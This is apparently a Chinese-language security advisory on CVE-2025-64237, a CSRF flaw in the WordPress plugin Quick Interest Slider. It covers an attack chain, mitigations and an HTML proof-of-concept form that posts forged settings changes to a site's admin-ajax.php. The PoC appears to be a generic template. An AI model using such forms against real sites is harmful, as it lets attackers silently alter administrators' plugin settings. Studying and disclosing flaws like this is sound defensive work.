CVE-2025-64237 WordPress Quick Interest Slider插件跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-64237

漏洞类型

CSRF

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Quick Interest Slider WordPress Plugin (WordPress插件)

漏洞概述

CVE-2025-64237是WordPress插件Quick Interest Slider中的一个跨站请求伪造（CSRF）漏洞。该漏洞存在于插件的3.1.5及以下版本中，攻击者可以利用此漏洞诱骗已登录的WordPress管理员用户在不知情的情况下执行非预期的操作。由于CSRF攻击利用的是用户已认证的身份，攻击者无法直接获取用户凭证，但可以通过构造恶意请求让受害者执行插件中的管理功能，如修改配置参数等。此漏洞的CVSS评分为4.3，属于中等严重程度，主要影响需要用户交互的特性，攻击复杂度较低但需要诱导用户访问恶意页面。

技术细节

跨站请求伪造（CSRF）是一种利用用户已认证身份的攻击方式。在Quick Interest Slider插件中，缺少对重要操作（如插件配置更新）的CSRF令牌验证。攻击者可以创建一个包含恶意表单的网页，当WordPress管理员访问该页面时，浏览器会自动向目标网站发送请求。由于浏览器会自动携带目标网站的Cookie，服务器会认为这是合法用户的操作。攻击者通常会在恶意页面中构造一个自动提交的表单，指向WordPress管理后台的插件功能端点，如/wp-admin/admin-post.php或类似的AJAX处理程序。该请求可能包含修改插件设置的参数，如利率配置等。由于插件未验证请求的来源是否通过正常的表单提交（缺少nonce令牌验证），攻击者可以成功执行这些操作。

攻击链分析

STEP 1

步骤1

攻击者创建一个包含恶意表单的网页，表单指向目标WordPress网站的插件处理端点

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或恶意网站诱导WordPress管理员访问该恶意页面

STEP 3

步骤3

当管理员访问页面时，浏览器自动向目标站点发送POST请求，携带有效的管理员认证Cookie

STEP 4

步骤4

Quick Interest Slider插件接收到请求，由于缺少CSRF令牌验证，认为这是合法管理员的操作

STEP 5

步骤5

插件执行请求中的操作，如修改利率配置或其他设置，攻击者成功实现对插件配置的非授权修改

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-64237 -->
<!-- This PoC demonstrates the CSRF vulnerability in Quick Interest Slider plugin -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF PoC - CVE-2025-64237</title>
</head>
<body>
    <h1>CSRF PoC for Quick Interest Slider Plugin</h1>
    <p>Click the button below to trigger the CSRF attack:</p>
    
    <!-- Form that auto-submits to WordPress admin-ajax.php or admin-post.php -->
    <form id="csrfForm" action="http://target-site/wp-admin/admin-ajax.php" method="POST">
        <!-- Add plugin-specific action and parameters -->
        <input type="hidden" name="action" value="quick_interest_slider_save_settings">
        <input type="hidden" name="interest_rate" value="99.99">
        <input type="hidden" name="min_amount" value="0">
        <!-- Additional plugin parameters can be added here -->
        <button type="submit">Submit Malicious Request</button>
    </form>
    
    <script>
        // Auto-submit form when page loads
        // document.getElementById('csrfForm').submit();
        
        console.log('CSRF PoC loaded. Form ready for submission.');
        console.log('Target: Quick Interest Slider Plugin <= 3.1.5');
        console.log('Vulnerability: Missing CSRF token validation');
    </script>
    
    <h2>Attack Scenario:</h2>
    <ol>
        <li>Attacker creates this malicious page</li>
        <li>WordPress admin visits the page while logged in</li>
        <li>Browser automatically sends authenticated request</li>
        <li>Plugin processes request without CSRF validation</li>
        <li>Attacker successfully modifies plugin settings</li>
    </ol>
</body>
</html>

影响范围

Quick Interest Slider <= 3.1.5

防御指南

临时缓解措施

作为临时缓解措施，可以暂时禁用或删除Quick Interest Slider插件，直到官方发布安全更新。同时，应教育管理员不要点击不明链接，并在浏览器中启用CSRF保护。对于必须使用的场景，可通过Web应用防火墙（WAF）添加CSRF防护规则，拦截异常请求。